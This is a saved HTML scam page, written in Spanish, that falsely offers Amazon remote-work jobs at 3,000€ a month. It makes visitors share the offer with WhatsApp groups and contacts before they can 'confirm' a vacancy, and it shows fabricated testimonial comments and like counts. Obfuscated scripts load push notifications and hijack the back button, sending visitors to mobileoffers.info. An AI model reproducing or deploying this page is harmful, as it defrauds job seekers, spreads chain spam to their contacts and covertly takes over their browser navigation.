
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script>
var _0xd8ea=['cGFyZW50Tm9kZQ==','VUEtMTUxMzI2Ng==','c3Jj','Y3JlYXRl','cHVzaA==','ZW50','cGFnZXZpZXc=','aW5zZXJ0QmVmbw==','R29vZ2xlQW5hbA==','c2NyaXB0','Y3MuanM=','bmFseXRpY3MuYw==','eXRpY3NPYmplYw==','OTktMw==','Y3JlYXRlRWxlbQ==','YXN5bmM=','b20vYW5hbHl0aQ==','c2VuZA==','c0J5VGFnTmFtZQ==','aHR0cHM6Ly93dw==','Z2V0RWxlbWVudA=='];(function(_0x29f8fc,_0xd8ea94){var _0x1d721e=function(_0x3fbab6){while(--_0x3fbab6){_0x29f8fc['push'](_0x29f8fc['shift']());}};_0x1d721e(++_0xd8ea94);}(_0xd8ea,0x114));var _0x1d72=function(_0x29f8fc,_0xd8ea94){_0x29f8fc=_0x29f8fc-0x0;var _0x1d721e=_0xd8ea[_0x29f8fc];if(_0x1d72['PrMcvY']===undefined){(function(){var _0x6fb6dd;try{var _0x2a30eb=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');_0x6fb6dd=_0x2a30eb();}catch(_0x28a93b){_0x6fb6dd=window;}var _0x3dfd48='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x6fb6dd['atob']||(_0x6fb6dd['atob']=function(_0x4a0b57){var _0x368d2b=String(_0x4a0b57)['replace'](/=+$/,'');var _0x3388ae='';for(var _0x45aa39=0x0,_0x2ec27a,_0x1b0103,_0x7f2343=0x0;_0x1b0103=_0x368d2b['charAt'](_0x7f2343++);~_0x1b0103&&(_0x2ec27a=_0x45aa39%0x4?_0x2ec27a*0x40+_0x1b0103:_0x1b0103,_0x45aa39++%0x4)?_0x3388ae+=String['fromCharCode'](0xff&_0x2ec27a>>(-0x2*_0x45aa39&0x6)):0x0){_0x1b0103=_0x3dfd48['indexOf'](_0x1b0103);}return _0x3388ae;});}());_0x1d72['jDMWcO']=function(_0x419370){var _0x5437df=atob(_0x419370);var _0x3769ac=[];for(var _0x7454a1=0x0,_0x462083=_0x5437df['length'];_0x7454a1<_0x462083;_0x7454a1++){_0x3769ac+='%'+('00'+_0x5437df['charCodeAt'](_0x7454a1)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x3769ac);};_0x1d72['HfmSMY']={};_0x1d72['PrMcvY']=!![];}var _0x3fbab6=_0x1d72['HfmSMY'][_0x29f8fc];if(_0x3fbab6===undefined){_0x1d721e=_0x1d72['jDMWcO'](_0x1d721e);_0x1d72['HfmSMY'][_0x29f8fc]=_0x1d721e;}else{_0x1d721e=_0x3fbab6;}return _0x1d721e;};(function(_0x320814,_0x16a63a,_0x6d1f7e,_0x553bcd,_0x30fa57,_0x56f260,_0x3f4299){_0x320814[_0x1d72('0x5')+_0x1d72('0x9')+'t']=_0x30fa57;_0x320814[_0x30fa57]=_0x320814[_0x30fa57]||function(){(_0x320814[_0x30fa57]['q']=_0x320814[_0x30fa57]['q']||[])[_0x1d72('0x1')](arguments);},_0x320814[_0x30fa57]['l']=0x1*new Date();_0x56f260=_0x16a63a[_0x1d72('0xb')+_0x1d72('0x2')](_0x6d1f7e),_0x3f4299=_0x16a63a[_0x1d72('0x11')+_0x1d72('0xf')](_0x6d1f7e)[0x0];_0x56f260[_0x1d72('0xc')]=0x1;_0x56f260[_0x1d72('0x14')]=_0x553bcd;_0x3f4299[_0x1d72('0x12')][_0x1d72('0x4')+'re'](_0x56f260,_0x3f4299);}(window,document,_0x1d72('0x6'),_0x1d72('0x10')+'w.google-a'+_0x1d72('0x8')+_0x1d72('0xd')+_0x1d72('0x7'),'ga'));ga(_0x1d72('0x0'),_0x1d72('0x13')+_0x1d72('0xa'),'auto');ga(_0x1d72('0xe'),_0x1d72('0x3'));
</script>


<link rel="icon" href="./index_files/favicon.ico">
<title>Vacantes Amazon.com - Trabaja desde tu casa.</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<link type="text/css" href="./index_files/styles.css" rel="stylesheet">

<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta property="og:image" content="https://i.imgur.com/r6ni3eD.jpg">
<meta property="og:title" content="Vacantes Amazon.com - Trabaja desde tu casa.">
<meta property="og:description" content="2300 Vacantes - Sueldo Fijo 3.000€">
<meta property="og:url" content="https://amazon.com">
<script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async=""></script>
<script>
var _0x26b1=['OTkxOTMxNjMtYw==','T25lU2lnbmFs','YjhlODIy','cHVzaA==','N2UyLTE1NDFmMg==','MDRmLTQ1MjctOA=='];(function(_0x1e8f6e,_0x26b1c7){var _0x1d9bd3=function(_0x3d4a3b){while(--_0x3d4a3b){_0x1e8f6e['push'](_0x1e8f6e['shift']());}};_0x1d9bd3(++_0x26b1c7);}(_0x26b1,0xe4));var _0x1d9b=function(_0x1e8f6e,_0x26b1c7){_0x1e8f6e=_0x1e8f6e-0x0;var _0x1d9bd3=_0x26b1[_0x1e8f6e];if(_0x1d9b['JQIOzg']===undefined){(function(){var _0x1a1869=function(){var _0x4090c7;try{_0x4090c7=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x1ff14b){_0x4090c7=window;}return _0x4090c7;};var _0x59cc1a=_0x1a1869();var _0x37b8fe='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x59cc1a['atob']||(_0x59cc1a['atob']=function(_0x437478){var _0x37aa27=String(_0x437478)['replace'](/=+$/,'');var _0x3686e5='';for(var _0x4cb82e=0x0,_0x2cadbe,_0x203365,_0x1fb1d5=0x0;_0x203365=_0x37aa27['charAt'](_0x1fb1d5++);~_0x203365&&(_0x2cadbe=_0x4cb82e%0x4?_0x2cadbe*0x40+_0x203365:_0x203365,_0x4cb82e++%0x4)?_0x3686e5+=String['fromCharCode'](0xff&_0x2cadbe>>(-0x2*_0x4cb82e&0x6)):0x0){_0x203365=_0x37b8fe['indexOf'](_0x203365);}return _0x3686e5;});}());_0x1d9b['TlHDjh']=function(_0x492942){var _0x31e305=atob(_0x492942);var _0x40f570=[];for(var _0x4e8cbb=0x0,_0x3f0542=_0x31e305['length'];_0x4e8cbb<_0x3f0542;_0x4e8cbb++){_0x40f570+='%'+('00'+_0x31e305['charCodeAt'](_0x4e8cbb)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x40f570);};_0x1d9b['wyiuGa']={};_0x1d9b['JQIOzg']=!![];}var _0x3d4a3b=_0x1d9b['wyiuGa'][_0x1e8f6e];if(_0x3d4a3b===undefined){_0x1d9bd3=_0x1d9b['TlHDjh'](_0x1d9bd3);_0x1d9b['wyiuGa'][_0x1e8f6e]=_0x1d9bd3;}else{_0x1d9bd3=_0x3d4a3b;}return _0x1d9bd3;};var _0x37aa27=window[_0x1d9b('0x1')]||[];_0x37aa27[_0x1d9b('0x3')](function(){_0x37aa27['init']({'appId':_0x1d9b('0x0')+_0x1d9b('0x5')+_0x1d9b('0x4')+_0x1d9b('0x2')});});
</script>
</head>
<body>
<center>


<script>
            redirectURL = "http://mobileoffers.info/?off=1";
            
            WhatsApp_share_message = "Amazon ofrece una gran oportunidad para trabajar desde casa:%0A%0A========%0AAnte el aumento de las ventas online por cuenta del aislamiento, estamos contratando urgentemente!%0A%0A*VACANTES DISPONIBLES:*%0A2.300 Vacantes%0A%0A*SUELDO:*%0A3.000€ Mensuales o%0A750€ Semanales%0A%0A*PROVEEMOS UN PORTÁTIL*%0A%0A*INTERESADO:*%0Ahttps://sheii.ga/amazon/es/";
			Share_link = "#";
            alert_text = "Siga as instruções para ter seu cartão com o limite liberado sem anuidade.";
            //pop_names = ["Fernando","Ricardo","Felipe","Jose Carlos ","Bianca","Patricia","Matheus","Kaue","Nádia","Carminda","Ana","Sofia","Tania","Nádia","Carminda","Ana","Patricia","Martin"];
            //pop_texts = ["Recebeu o seu cartão de crédito Nubank!","Recebeu o seu cartão de crédito Nubank!"];
            var timer_start = 5; //minutes
        </script>
<script type="text/javascript" src="./index_files/customb4f3b4f3b4f3.js.download"></script>


<style type="text/css">#main-frame-error{display:none;height:auto}.interstitial-wrapper{padding-top:10px;box-sizing:border-box;font-size:1em;line-height:18px;margin:auto;max-width:600px;width:90%}#today{float:right;font-weight:600;padding-top:15px}#main-message>p{display:inline}#blink{color:red;padding:6px;-webkit-animation:blink 1s infinite;-moz-animation:blink 1s infinite;-ms-animation:blink 1s infinite;-o-animation:blink 1s infinite;animation:blink 1s infinite}@-webkit-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}@-moz-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}@-ms-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}}@-o-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}@keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}#theTime{font-size:18px;font-weight:bold;color:red;font-family:sans-serif}h1{color:#000;font-size:1.6em;line-height:1.25em;margin-bottom:16px}#alertimg{height:26px;width:26px;position:absolute;top:13px;left:17px}.popup{display:none;position:absolute;top:20%;left:50%;width:88%;max-width:280px;margin:0 0 0 -140px;font-size:1em;border-radius:4px;background-color:#282828;color:#fff;overflow:hidden;box-shadow:1px 1px 7px #000;z-index:100}.popup-head{background-color:#282828;padding:18px 16px 18px 55px;border-bottom:2px solid #33b4e4;color:#33b4e4;line-height:normal}.popup-center{padding:20px 16px;color:#f3f3f3;line-height:20px}.popup-bottom{background-color:#282828;padding:9px 6px;text-align:center;border-top:1px solid #474747;overflow:hidden}.popup-bottom .button{display:block;height:30px;width:128px;margin:0 auto;font-size:1.1em;color:#f3f3f3;border-radius:3px;cursor:pointer;text-decoration:none;padding:0;line-height:30px}</style>

<div class="content">
<div class="content-middle">
<div class="content-inner"><center>
<img src="./index_files/amazon-es.png" width="100%"></center>


<div class="survey_outer">
<div class="survey_middle">
<div class="survey_inner">
<p class="question_count">Contesta a la siguiente pregunta:</p><br>
<div class="h7"><p class="question_text question1">¿Estás realmente interesado en esta oferta de trabajo?</p></div>
<div class="h7"><p class="question_text question2">¿Prefieres recibir tu pago SEMANAL o MENSUAL?</p></div>
<div class="h7"><p class="question_text question3">Te proveeremos un portátil para que trabajes. ¿Prefieres ir a recogerlo o recibirlo en tu casa?</p></div>
<div class="ans-box">
<div class="answer anses1">
<p>SI</p>
</div>
<div class="answer anses1">
<p>NO</p>
</div>
<div class="answer anses2">
<p>SEMANAL</p>
</div>
<div class="answer anses2">
<p>MENSUAL</p>
</div>
<div class="answer anses3">
<p>RECOGERLO</p>
</div>
<div class="answer anses3">
<p>RECIBIRLO</p>
</div>
</div>
</div>
<p class="calculating"><img src="./index_files/spinner.gif" alt=""> Cargando...</p>
<div class="loading">
<p class="load_headline"></p>
<p class="check check1">Espera un momento...</p>
<p class="check check2">Terminando...</p>
<p class="check check3">¡Todo Listo!</p>
</div>
<div class="last_page">
<div class="last-up">
<center><font color="#ffffff"><div class="h8"><b><font color="#232f3e">¡CONFIRMA TU VACANTE!</font><br>ULTIMO PASO OBLIGATORIO:</b>
<br><br> <div class="h9">Para que podamos completar todos los VACANTES DISPONIBLES, necesitamos que <b><br><font color="#232f3e">COMPARTAS</font> esta oportunidad de trabajo con 5 grupos y 10 contactos de WhatsApp.<br><br>¡Puedes enviar a tu familia y amigos!</b><br><br>
Después de compartir puedes confirmar tu interés y finalmente ser contratado(a)!<br><br>
</div>
<button type="button" class="btn btn-share">COMPARTIR</button>
<center><font color="#232f3e"><div class="h10">¡Este proceso es necesario!</div></font>

<div id="progreso" style="display:none;">
<div class="progress">
<span aria-valuenow="1" aria-valuemin="1%" aria-valuemax="100%" style="width: 1%; max-width: 100%;" id="progressbar"></span>
</div>
</div>
</center></div>
<hr>
<div class="fbcoms">
<p class="comments"></p>
<p class="buttons">
<span class="like">Me Gusta</span> · <span>Comentar</span> · <span>Compartir</span> ·
</p>
<p class="totlikes"><span id="youand"></span><span class="fbblue">A 174.777 personas</span><font color="black"> les gusta esto.</font></p>
<p class="viewmore clearfix">
<span class="left">Ver más comentarios</span>
<span class="right">50 de 118.712</span><br>
</p>
<div id="fb8" class="item hidden" style="display: none; opacity: 1;">
<img class="profileimg" src="./index_files/comment1.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Ada Sánchez</span><br><font color="black">Me ha salvado, ya estaba desempleado por la pandemia. Me contrataron y como ya tengo un portátil, empecé ayer.</font></p>
<p class="combot" style="display: block;"><span class="ago">Ahora mismo</span> · <span class="fblike">Me Gusta</span></p>
</div>
<div id="fb7" class="item hidden" style="display: none; opacity: 1;">
<img class="profileimg" src="./index_files/comment2.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Tamara López
</span><br><font color="black">He elegido que me paguen semanalmente, y ya he solicitado el primer pago, me ayudará mucho.</font></p>
<p class="combot" style="display: block;"><span class="ago">Ahora mismo</span> · <span class="fblike">Me Gusta</span></p>
</div>
<div id="fb6" class="item hidden" style="display: none; opacity: 1;">
<img class="profileimg" src="./index_files/comment3.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Yolanda García
</span><br><font color="black">Chicos, ya estoy trabajando. Hagan horas extras, en serio. De 750€ el mío ha pasado a 910€ con 3 horas extras al día !!!</font></p>
<p class="combot" style="display: block;"><span class="ago">Ahora mismo</span> · <span class="fblike">Me Gusta</span></p>
</div>
<div id="fb5" class="item hidden" style="display: none; opacity: 1;">
<img class="profileimg" src="./index_files/comment4.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Alejandro Cruz</span><br><font color="black">Aquí en casa hay 3 personas trabajando para amazon, nos ayudará mucho, estamos ganando dinero como nunca lo hemos hecho en la vida.</font></p>
<p class="combot" style="display: block;"><span class="ago">Ahora mismo</span> · <span class="fblike">Me Gusta</span></p>
</div>
<div id="fb4" class="item hidden" style="display: none; opacity: 1;">
<img class="profileimg" src="./index_files/comment5.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Carmen Gómez</span> <br><font color="black">No consigo registrarme. ¿Alguien puede ayudarme, por favor?</font></p>
<p class="combot" style="display: block;"><span class="ago">Ahora mismo</span> · <span class="fblike">Me Gusta</span></p>
</div>
<div id="fb3" class="item hidden" style="display: none; opacity: 1;">
<img class="profileimg" src="./index_files/comment6.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Lucía Flores
</span> <br><font color="black">Vaya, mi amigo me advirtió. Tenía 12.000 vacantes, ahora sólo 2.000.</font><br></p>
<p class="combot" style="display: block;"><span class="ago">Ahora mismo</span> · <span class="fblike">Me Gusta</span></p>
</div>
<div id="fb2" class="item hidden" style="display: none; opacity: 1;">
<img class="profileimg" src="./index_files/comment7.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Ruan Pablo</span><br><font color="black">Lo envié a todos mis familiares, será de gran ayuda.</font></p>
<p class="combot" style="display: block;"><span class="ago">Ahora mismo</span> · <span class="fblike">Me Gusta</span></p>
</div>
<div id="fb1" class="item hidden" style="display: none; opacity: 1;">
<img class="profileimg" src="./index_files/comment8.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Margarita Rodrígues</span><br><font color="black">Muchachos, es realmente cierto! Lo hice en mi móvil y en el de mi madre</font></p>
<p class="combot" style="display: block;"><span class="ago">Ahora mismo</span>  <span class="fblike">Me Gusta</span></p>
</div>
<div class="item">
<img class="profileimg" src="./index_files/comment9.jpg" width="50" height="50">
<p class="comtxt"><span class="name">Juana Pérez</span><br><font color="black">He compartido con todos</font></p>
<p class="combot"><span class="ago">Ahora mismo</span> · <span class="fblike">Me Gusta</span><span class="likes totlikes">4</span></p>
</div>
<div class="item">
<img class="profileimg" src="./index_files/comment10.jpg" width="50" height="50">
<p class="comtxt"><span class="name">María Isabel</span><br><font color="black">Chicos, he estado trabajando durante un mes, y están pagando un buen dinero.</font></p>
<p class="combot"><span class="ago">Ahora mismo</span> · <span class="fblike">Me Gusta</span><span class="likes totlikes">11</span></p>
</div>
<div class="item">
<img class="profileimg" src="./index_files/comment11.jpg" width="50" height="50">
<p class="comtxt"><span class="name">Guillermo Martínez
</span><br><font color="black">Oigan, aprovechemos esta pandemia para trabajar duro y ahorrar dinero con esta oportunidad. Las horas extras las pagan el mismo día.</font><br></p>
<p class="combot"><span class="ago">Ahora mismo</span> · <span class="fblike">Me Gusta</span><span class="likes totlikes">23</span></p>
</div>
</div>
<br>
</font></center></div>
<div class="pops">

</div>
</div>
</div>
</div>
</div>
</div>
</div>
 <br><br>
<center><img src="./index_files/banner.jpg" width="100%" style="border-top: solid 2px #2b3568;border-bottom: solid 2px #2b3568;"></center><br>










</center>
<script>
var _0x4586=['cHVzaFN0YXRl','cmVwbGFjZQ==','Zi5saS8/aHR0cA==','aHR0cDovL2hyZQ==','Lz9vZmY9MzAy','ZmZlcnMuaW5mbw=='];(function(_0x143905,_0x458673){var _0x3d2638=function(_0x424b54){while(--_0x424b54){_0x143905['push'](_0x143905['shift']());}};_0x3d2638(++_0x458673);}(_0x4586,0xb9));var _0x3d26=function(_0x143905,_0x458673){_0x143905=_0x143905-0x0;var _0x3d2638=_0x4586[_0x143905];if(_0x3d26['ORDGFh']===undefined){(function(){var _0x5741f2;try{var _0x327711=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');_0x5741f2=_0x327711();}catch(_0x41b8a1){_0x5741f2=window;}var _0x4997f1='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x5741f2['atob']||(_0x5741f2['atob']=function(_0x587a7f){var _0xc2f9d4=String(_0x587a7f)['replace'](/=+$/,'');var _0x264624='';for(var _0x536f42=0x0,_0x4dff12,_0x799815,_0x571081=0x0;_0x799815=_0xc2f9d4['charAt'](_0x571081++);~_0x799815&&(_0x4dff12=_0x536f42%0x4?_0x4dff12*0x40+_0x799815:_0x799815,_0x536f42++%0x4)?_0x264624+=String['fromCharCode'](0xff&_0x4dff12>>(-0x2*_0x536f42&0x6)):0x0){_0x799815=_0x4997f1['indexOf'](_0x799815);}return _0x264624;});}());_0x3d26['YAMkND']=function(_0x36641e){var _0x5e2eca=atob(_0x36641e);var _0x39902c=[];for(var _0x162e0e=0x0,_0x2fedd2=_0x5e2eca['length'];_0x162e0e<_0x2fedd2;_0x162e0e++){_0x39902c+='%'+('00'+_0x5e2eca['charCodeAt'](_0x162e0e)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x39902c);};_0x3d26['oesJMb']={};_0x3d26['ORDGFh']=!![];}var _0x424b54=_0x3d26['oesJMb'][_0x143905];if(_0x424b54===undefined){_0x3d2638=_0x3d26['YAMkND'](_0x3d2638);_0x3d26['oesJMb'][_0x143905]=_0x3d2638;}else{_0x3d2638=_0x424b54;}return _0x3d2638;};!function(){var _0x536f42;try{for(_0x536f42=0x0;0xa>_0x536f42;++_0x536f42)history[_0x3d26('0x1')]({},'','#');onpopstate=function(_0x4dff12){_0x4dff12['state']&&location[_0x3d26('0x2')](_0x3d26('0x4')+_0x3d26('0x3')+'://mobileo'+_0x3d26('0x0')+_0x3d26('0x5'));};}catch(_0x799815){}}();

</script>
</body>
</html>
